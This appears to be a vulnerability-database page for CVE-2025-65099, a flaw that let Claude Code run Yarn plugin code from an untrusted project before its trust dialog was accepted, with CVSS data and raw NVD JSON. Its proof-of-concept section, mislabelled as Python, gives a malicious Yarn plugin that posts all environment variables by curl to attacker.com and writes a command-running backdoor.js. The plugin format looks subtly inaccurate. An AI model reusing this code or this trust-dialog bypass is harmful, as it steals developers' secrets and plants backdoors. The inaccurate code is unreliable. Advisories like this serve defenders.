CVE-2025-65099

Description

Claude Code is an agentic coding tool. Prior to version 1.0.39, when running on a machine with Yarn 3.0 or above, Claude Code could have been tricked to execute code contained in a project via yarn plugins before the user accepted the startup trust dialog. Exploiting this would have required a user to start Claude Code in an untrusted directory and to be using Yarn 3.0 or above. This issue has been patched in version 1.0.39.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:anthropic:claude_code:*:*:*:*:*:node.js:*:* - VULNERABLE

Claude Code < 1.0.39

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Malicious Yarn plugin that executes arbitrary code before trust dialog
// Place this in a project's .yarn/plugins/ directory

// Plugin manifest (.yarnrc.yml)
// yarnPath: .yarn/releases/yarn-3.6.0.cjs
// plugins:
//   - path: .yarn/plugins/malicious-plugin.js

// malicious-plugin.js
const { execSync } = require('child_process');

// This plugin executes before user accepts trust dialog
module.exports = {
  name: 'malicious-plugin',
  hooks: {
    afterAllInstalled: (project) => {
      // Execute arbitrary code
      console.log('[+] Malicious plugin triggered!');
      
      // Example: Exfiltrate environment variables
      const envData = JSON.stringify(process.env);
      execSync(`curl -X POST https://attacker.com/exfil -d "${envData}"`, {
        encoding: 'utf-8'
      });
      
      // Example: Add backdoor to project files
      execSync('echo "module.exports = require(\'child_process\').execSync(process.argv[2]);" > backdoor.js');
      
      return project;
    }
  }
};

// Alternative: package.json malicious script
// {
//   "name": "malicious-project",
//   "scripts": {
//     "preinstall": "malicious_command_here"
//   }
// }

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-65099
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-65099
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-65099/
[4] VulDB https://vuldb.com/cve/CVE-2025-65099
[5] https://github.com/anthropics/claude-code/security/advisories/GHSA-5hhx-v7f6-x7gv

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-65099", "sourceIdentifier": "[email protected]", "published": "2025-11-19T18:15:51.837", "lastModified": "2025-11-25T19:32:20.650", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Claude Code is an agentic coding tool. Prior to version 1.0.39, when running on a machine with Yarn 3.0 or above, Claude Code could have been tricked to execute code contained in a project via yarn plugins before the user accepted the startup trust dialog. Exploiting this would have required a user to start Claude Code in an untrusted directory and to be using Yarn 3.0 or above. This issue has been patched in version 1.0.39."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:anthropic:claude_code:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "1.0.39", "matchCriteriaId": "F9319590-C852-4610-84AB-311B721A4554"}]}]}], "references": [{"url": "https://github.com/anthropics/claude-code/security/advisories/GHSA-5hhx-v7f6-x7gv", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}